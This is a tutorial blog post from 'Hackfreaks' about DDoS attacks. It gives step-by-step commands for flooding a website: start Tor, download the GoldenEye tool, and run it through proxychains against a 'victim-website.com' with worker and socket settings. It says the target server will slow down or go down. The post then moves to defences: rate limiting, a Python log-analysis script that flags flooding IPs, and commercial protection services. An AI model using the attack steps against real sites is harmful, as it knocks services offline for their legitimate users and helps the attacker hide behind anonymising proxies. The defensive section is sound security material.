Hello my little Freaks, Hackfreaks here. Today we'll talk about how a DDoS attack is carried out and how to protect ourselves. Brought to you by Hackfreaks official. So let's get started.

Briefly about "DDoS"
DDoS (short for Distributed Denial of Service) is an attack on a computing system with the aim of bringing it to failure, that is, creating conditions under which legitimate users of the system cannot access the resources it provides (servers), or can access them only with difficulty.
How does this attack work and who is using it?
Each web server has a limit on the number of requests that the web server can serve simultaneously. If the number of requests exceeds the permissible limit, the following is quite possible:
1. Slowdown of the server (slowing down the processing of requests)
2. Complete denial of service requests
Most often, attackers seek the second - a complete denial of service. The motives can be different: from protecting users from fraudulent sites to banal boredom.
But it should be said that these attacks are used not only by cybercriminals, but also by "white hat" hackers, i.e. pentesters. With this attack, ethical hackers test web servers for their capacity and ability to process a large number of requests simultaneously.
DDoS works like this: an attacker creates a network of "zombie computers" (in fact, these are not necessarily computers: all devices capable of sending requests are suitable for this attack), and subsequently uses this network to carry out the attack.
Imagine a situation: the maximum volume of traffic that the server can receive is 1 GB. The attacker tries to reach or exceed this limit. If it works, the server slows down at first, and then it can go down.
Now for the fun part: how to carry out such an attack? We will warn you right away - everything described below is provided for informational purposes only. You must not break someone else's servers; doing so can get you into trouble with the law. We warned you.
Required tools
EtherApe - a graphical network monitor that displays network activity. Hosts and links change in size with traffic, and protocols are color-coded.
Tor service - Tor allows clients and relays to offer hidden services. That is, you can offer a web server, SSH server, etc. without revealing your IP address to your users.
Proxychains - The latest version of Proxychains supports SOCKS5, SOCKS4 and HTTP CONNECT. Proxy chains can be mixed with different types of proxies.
GoldenEye - GoldenEye is a python application for security testing purposes only.
How to perform a DDOS attack on a website?
1. Run EtherApe with the command etherape; a window will appear that graphically displays network activity.
2. Start the TOR service:
service tor start
3. Download Goldeneye
https://github.com/jseidl/GoldenEye
wget https://github.com/jseidl/GoldenEye
4. After downloading, unzip it to a folder
unzip GoldenEye-master.zip
5. Start attack
/ GoldenEye-master # proxychains ./goldeneye.py http://testdomain.com

Add values for workers (-w), sockets (-s) and method (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post
If you don't stop the attack, in some cases it will "explode". To stop the attack just press CTRL + C.
Done. After a while, the server will slow down, and then, possibly, it will go down.
General protection against DDOS attacks
Rate-limit connections per IP address.
Use an IDS and web application firewalls.
Tune the connections-per-IP threshold.
Protect your DNS servers.
Install protective equipment. Make sure you have the appropriate protections installed for both your networks and your applications. This includes key tools such as firewalls, network monitoring and anti-virus software, and threat monitoring systems. You can use these to monitor basic network traffic and set up alerts for unusual behavior.
Keep everything updated. All of these systems must be kept up to date so that any bugs or problems are corrected. Detecting threats as early as possible is the best way to prevent DDoS attacks against critical network infrastructure from impacting end users.
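The per-IP threshold idea from the list above can be checked against a web server access log. This is an added example, not code from the original post or from any tool it mentions: it counts requests per source IP in a sliding window and flags addresses over the limit. The Common Log Format input, the threshold values and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Common Log Format prefix: client IP, identity, user, [timestamp], "request
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "')

def parse_line(line):
    """Return (ip, datetime) for one access-log line, or None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    try:
        ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return m.group(1), ts

def find_flooders(lines, max_requests=20, window_seconds=10):
    """Flag IPs exceeding max_requests inside any sliding window.

    Assumes each IP's lines arrive in time order (as in a normal access log).
    Returns {ip: peak request count seen inside one window}.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue              # skip garbage instead of crashing on it
        ip, ts = parsed
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() >= window_seconds:
            q.popleft()           # drop requests that fell out of the window
        if len(q) > max_requests:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

def sample_log():
    """Constructed sample: one noisy client, one normal client, one bad line."""
    lines = []
    for i in range(60):   # 203.0.113.7 sends 60 requests within 6 seconds
        lines.append('203.0.113.7 - - [01/Jan/2024:12:00:%02d +0000] '
                     '"POST /?r=%d HTTP/1.1" 200 512' % (i // 10, i))
    for i in range(5):    # 198.51.100.4 sends 5 requests over 50 seconds
        lines.append('198.51.100.4 - - [01/Jan/2024:12:00:%02d +0000] '
                     '"GET /index.html HTTP/1.1" 200 1024' % (i * 10))
    lines.append("not a log line")
    return lines

if __name__ == "__main__":
    for ip, peak in find_flooders(sample_log()).items():
        print(f"{ip} peaked at {peak} requests per 10 s window")
```

The flagged addresses are candidates for a firewall or WAF rate-limit rule; set the threshold above what your busiest legitimate clients (shared NAT gateways, monitoring probes) normally generate.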
DDoS Prevention Tools
There are several tools that I recommend for preventing and stopping DDoS attacks.
1. Security Event Manager

For tracking network behavior and flagging threats before they become overwhelming, I like SolarWinds Security Event Manager (SEM).
The ability to quickly respond to threats is vital, as security initiatives can quickly become useless if they take too long to deploy. SEM includes automated responses that can block suspicious IPs or USB devices, disable malicious devices or revoke their privileges, and kill applications that behave in unexpected ways. This means that delays when dealing with something like a DDoS attack are kept to a minimum.
SEM also monitors the integrity of files and USB, so if something looks wrong, it can be stopped.
SolarWinds SEM is offered free of charge for a thirty-day trial. After that, pricing is listed per node.
2. Cloudflare

Cloudflare offers a flexible and scalable tool that combines multiple DDoS prevention techniques in one solution. It prevents malicious traffic from entering your network, while the rest of the network remains functional and high performing. Cloudflare uses a reputation database to track potential threats from intruders.
For businesses, Cloudflare costs $200 per month, but at the enterprise level, you'll need to contact Cloudflare for a quote.
3. Imperva

Imperva DDoS protection covers the entire network and defends against attacks using high-capacity packet processing. It provides always-on or on-demand DDoS protection, whichever suits your business best, and also includes automatically updating dashboards that display information about attack traffic. The main disadvantage of the Imperva tool is that it is limited to DDoS protection.